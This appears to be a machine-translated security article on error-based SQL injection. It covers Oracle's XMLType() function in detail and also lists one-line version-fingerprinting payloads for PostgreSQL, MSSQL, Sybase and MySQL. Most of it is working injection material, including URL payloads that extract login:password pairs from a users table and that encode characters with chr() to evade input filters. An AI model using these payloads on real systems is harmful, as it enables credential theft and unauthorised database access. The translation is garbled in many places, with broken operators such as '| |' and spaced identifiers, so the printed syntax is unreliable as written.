Convinced that all known methods of operation of error-based blind SQL Injection not working in the environment of Oracle, my attention was attracted by the interaction function with the format of XML. Some dig deeper into them, was discovered function XMLType (), which returns the error message the first character of the requested data (LPX-00XXX):

 

SQL> select XMLType ((select 'abcdef' from dual)) from dual;

ERROR:

ORA-31011: XML parsing failed

ORA-19202: Error occurred in XML processing

LPX-00210: expected '<' instead of 'a'

Error at line 1

ORA-06512: at "SYS.XMLTYPE", line 301

ORA-06512: at line 1

no rows selected

SQL>

 

Even the bread. By using the substr () becomes possible character by character reading the required information. For example, you can quickly determine the version database:

 

select XMLType ((select substr (version, 1,1) from v $ instance)) from users;

select XMLType ((select substr (version, 2,1) from v $ instance)) from users;

select XMLType ((select substr (version, 3,1) from v $ instance)) from users;

... etc.

 

Reading a single character in a single request from the operation of blind SQL-injection - it's great, but it would be foolish to stop there.

 

Continuing to dig a function XMLType () I managed to find a similar way of forwarding data in the error message, which exists in other databases:

 

SQL> select XMLType ((select '<abcdef:root>' from dual)) from dual;

ERROR:

ORA-31011: XML parsing failed

ORA-19202: Error occurred in XML processing

LPX-00234: namespace prefix "abcdef" is not declared

...

SQL> select XMLType ((select '<: abcdef>' from dual)) from dual;

ERROR:

ORA-31011: XML parsing failed

ORA-19202: Error occurred in XML processing

LPX-00110: Warning: invalid QName ": abcdef" (not a Name)

...

SQL>

 

It seems to be all fine, but there are some pitfalls. The first snag is that the oracle does not happen automatically casting. Therefore, this request will generate an error:

 

SQL> select * from users where id = 1 and (1) = (select XMLType ((select '<: abcdef>'

 from dual)) from dual);

select * from users where id = 1 and (1) = (select XMLType ((select '<: abcdef>'

 from dual)) from dual)

ERROR at line 1:

ORA-00932: inconsistent datatypes: expected NUMBER got --

 

The second thing is that at oraklyatiny no limit and offset, which does not allow simple way to implement progressive reading of the data. And the third problem relates to the fact that the function XMLType () when processing errors truncate the data returned after some characters. For example, when a gap occurs in the string or character at ("@") et al.

 

But can razrulit;) To solve the problem with type casting can be used function upper (). Organize progressive reading of the data can be presented using the following uncomplicated design:

 

select id from (select id, rownum rnum from users a) where rnum = 1;

select id from (select id, rownum rnum from users a) where rnum = 2;

...

 

Well, in order to avoid loss of returned data may be used hex-encoding. Optionally, you can also get rid of the quotes in the submitted query using a numerical representation of characters (ascii), that in the future will bypass the filter in the processing of incoming data in the application. Thus, the final query will look like this:

 

select * from table where id = 1 and (1) = (select upper (xmltype (chr (60) | | chr (58) | | chr (58) | | (select rawtohex (login | | chr (58) | | chr (58) | | password) from (select login, password, rownum rnum from users a) where rnum = 1) | | chr (62))) from dual);

 

select * from table where id = 1 and (1) = (select upper (xmltype (chr (60) | | chr (58) | | chr (58) | | (select rawtohex (login | | chr (58) | | chr (58) | | password) from (select login, password, rownum rnum from users a) where rnum = 2) | | chr (62))) from dual);

...

 

Using this technique in a single http-request can be read up to 214 bytes in the annex (107 characters when using hex-encoding), which operates under the control of DBMS Oracle> = 9.0 and returns the error message:

 

http://server/?id = (1) and (1) = (select upper (xmltype (chr (60) | | chr (58) | | chr (58) | | (select rawtohex (login | | chr ( 58) | | chr (58) | | password) from (select login, password, rownum rnum from users a) where rnum = 1) | | chr (62))) from dual) --

 

 

 

 

 

To decode the data from the application in the operation of SQL-injection method described, including, may use the standard functions oracle utl_raw.cast_to_varchar2 ():

 

 

 

Thus, given the previous publication on this theme, universal access and rapid technological exploitation of error-based blind SQL Injection for the following databases: PostgreSQL, MSSQL, Sybase, and MySQL-version> = 4.1 and Oracle version> = 9.0. To identify the version of the database in a single http-request can be applied following structures:

 

PostgreSQL:

/? param = 1 and (1) = cast (version () as numeric) --

 

MSSQL:

/? param = 1 and (1) = convert (int, @ @ version) --

 

Sybase:

/? param = 1 and (1) = convert (int, @ @ version) --

 

MySQL> = 4.1 <5.0:

/? param = (1) and (select 1 from (select count (*), concat (version (), floor (rand (0) * 2)) x from TABLE_NAME group by x) a) --

 

OR

/? param = 1 and row (1,1)> (select count (*), concat (version (), 0x3a, floor (rand () * 2)) x from (select 1 union select 2) a group by x limit 1) --

 

MySQL> = 5.0:

/? param = (1) and (select 1 from (select count (*), concat (version (), floor (rand (0) * 2)) x from information_schema.tables group by x) a) --

 

Oracle> = 9.0:

/? param = 1 and (1) = (select upper (XMLType (chr (60) | | chr (58) | | chr (58) | | (select replace (banner, chr (32), chr (58)) from sys.v_ $ version where rownum = 1) | | chr (62))) from dual) --